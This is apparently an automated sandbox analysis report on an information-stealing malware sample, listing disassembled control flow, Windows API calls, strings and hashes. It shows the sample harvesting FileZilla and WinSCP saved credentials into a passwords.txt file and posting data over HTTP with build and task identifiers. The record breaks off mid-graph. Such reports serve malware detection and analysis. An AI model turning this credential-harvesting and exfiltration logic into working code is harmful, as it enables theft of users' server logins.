                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                      • API String ID: 4146028692-935134978
                                                                                      • Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                      • Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
                                                                                      • Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
                                                                                      • Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 451 406bb5-406c7a call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 466 406c82-406c88 451->466 467 406c7c 451->467 468 40763e-407666 InternetCloseHandle call 408048 466->468 469 406c8e-406e18 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 466->469 467->466 474 4076a5-40773e call 402920 * 4 call 401cde call 402920 * 3 call 41d016 468->474 475 407668-4076a0 call 410549 call 410609 call 41058d call 402920 468->475 469->468 549 406e1e-406e58 HttpOpenRequestA 469->549 475->474 550 407632-407638 InternetCloseHandle 549->550 551 406e5e-406e64 549->551 550->468 552 406e82-4075cf call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 551->552 553 406e66-406e7c InternetSetOptionA 551->553 792 407611-407629 InternetReadFile 552->792 553->552 793 4075d1-4075d9 792->793 794 40762b-40762c InternetCloseHandle 792->794 793->794 795 4075db-40760c call 410609 call 41058d call 402920 793->795 794->550 795->792
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                      • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                      • _memmove.LIBCMT ref: 00407578
                                                                                      • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                      • _memmove.LIBCMT ref: 004075A1
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                      • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                      • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                      • String ID: "$"$"$"$"$------$------$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode$status$task_id
                                                                                      • API String ID: 3702379033-1263117375
                                                                                      • Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                      • Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
                                                                                      • Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                      • Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 801 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 816 406000 801->816 817 406006-40600c 801->817 816->817 818 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 817->818 819 4066ff-406727 InternetCloseHandle call 408048 817->819 818->819 895 4061a2-4061dc HttpOpenRequestA 818->895 825 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 819->825 826 406729-406761 call 410549 call 410609 call 41058d call 402920 819->826 826->825 896 4061e2-4061e8 895->896 897 4066f3-4066f9 InternetCloseHandle 895->897 898 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 896->898 899 4061ea-406200 InternetSetOptionA 896->899 897->819 1042 4066d2-4066ea InternetReadFile 898->1042 899->898 1043 406692-40669a 1042->1043 1044 4066ec-4066ed InternetCloseHandle 1042->1044 1043->1044 1045 40669c-4066cd call 410609 call 41058d call 402920 1043->1045 1044->897 1045->1042
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                      • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,e90840a846d017e7b095f7543cdf2d15,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                      • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                      • _memmove.LIBCMT ref: 00406639
                                                                                      • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                      • _memmove.LIBCMT ref: 00406662
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                      • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                      • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                      • String ID: "$"$"$------$------$------$------$build_id$e90840a846d017e7b095f7543cdf2d15$mode
                                                                                      • API String ID: 3702379033-4195047346
                                                                                      • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                      • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                      • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                      • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1051 40e186-40e231 call 423c10 * 4 RegOpenKeyExA 1060 40e237-40e262 RegGetValueA 1051->1060 1061 40e6b8-40e6ce call 401cde call 41d016 1051->1061 1063 40e264-40e26a 1060->1063 1064 40e287-40e28d 1060->1064 1063->1061 1066 40e270-40e282 1063->1066 1064->1063 1067 40e28f-40e295 1064->1067 1066->1061 1069 40e297-40e2a3 1067->1069 1070 40e2a9-40e2c1 RegOpenKeyExA 1067->1070 1069->1070 1070->1061 1071 40e2c7-40e2e8 RegEnumKeyExA 1070->1071 1071->1063 1074 40e2ee-40e2f9 call 4104e7 1071->1074 1077 40e2fe-40e3dd call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 RegGetValueA 1074->1077 1096 40e42d-40e454 call 410609 call 41058d call 402920 1077->1096 1097 40e3df-40e42b call 412406 call 4105c7 call 41058d call 402920 * 2 1077->1097 1108 40e459-40e569 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 RegGetValueA call 410609 call 41058d call 402920 StrCmpCA 1096->1108 1097->1108 1138 40e5d1-40e636 call 410609 call 41058d call 402920 RegEnumKeyExA 1108->1138 1139 40e56b-40e590 call 40dca0 1108->1139 1138->1077 1153 40e63c-40e698 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 1138->1153 1145 40e592 1139->1145 1146 40e594-40e5cb call 410609 call 41058d call 402920 call 40f030 1139->1146 1145->1146 1146->1138 1167 40e69a-40e6a6 1153->1167 1168 40e6ad-40e6b3 call 402920 1153->1168 1167->1168 1168->1061
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0040E1B7
                                                                                      • _memset.LIBCMT ref: 0040E1D7
                                                                                      • _memset.LIBCMT ref: 0040E1E8
                                                                                      • _memset.LIBCMT ref: 0040E1F9
                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$Value$Open$Enum
                                                                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                      • API String ID: 3303087153-2798830873
                                                                                      • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                      • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                      • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                      • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1171 418643-418653 call 41859a 1174 418844-4188a1 LoadLibraryA * 5 1171->1174 1175 418659-41883f call 407d47 GetProcAddress * 20 1171->1175 1176 4188a3-4188b0 GetProcAddress 1174->1176 1177 4188b5-4188bc 1174->1177 1175->1174 1176->1177 1179 4188e7-4188ee 1177->1179 1180 4188be-4188e2 GetProcAddress * 2 1177->1180 1182 4188f0-4188fd GetProcAddress 1179->1182 1183 418902-418909 1179->1183 1180->1179 1182->1183 1184 41890b-418918 GetProcAddress 1183->1184 1185 41891d-418924 1183->1185 1184->1185 1187 418926-41894a GetProcAddress * 2 1185->1187 1188 41894f 1185->1188 1187->1188
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32 ref: 00418684
                                                                                      • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                      • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                      • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                      • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                      • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                      • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                      • GetProcAddress.KERNEL32 ref: 00418725
                                                                                      • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                      • GetProcAddress.KERNEL32 ref: 00418753
                                                                                      • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                      • GetProcAddress.KERNEL32 ref: 00418781
                                                                                      • GetProcAddress.KERNEL32 ref: 00418798
                                                                                      • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                      • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                      • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                      • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                      • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                      • GetProcAddress.KERNEL32 ref: 00418822
                                                                                      • GetProcAddress.KERNEL32 ref: 00418839
                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                      • GetProcAddress.KERNEL32(75A70000,004184C2), ref: 004188AA
                                                                                      • GetProcAddress.KERNEL32(75290000,004184C2), ref: 004188C5
                                                                                      • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                      • GetProcAddress.KERNEL32(75BD0000,004184C2), ref: 004188F7
                                                                                      • GetProcAddress.KERNEL32(75450000,004184C2), ref: 00418912
                                                                                      • GetProcAddress.KERNEL32(76E90000,004184C2), ref: 0041892D
                                                                                      • GetProcAddress.KERNEL32 ref: 00418944
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 2238633743-0
                                                                                      • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                      • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                      • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                      • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1189 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 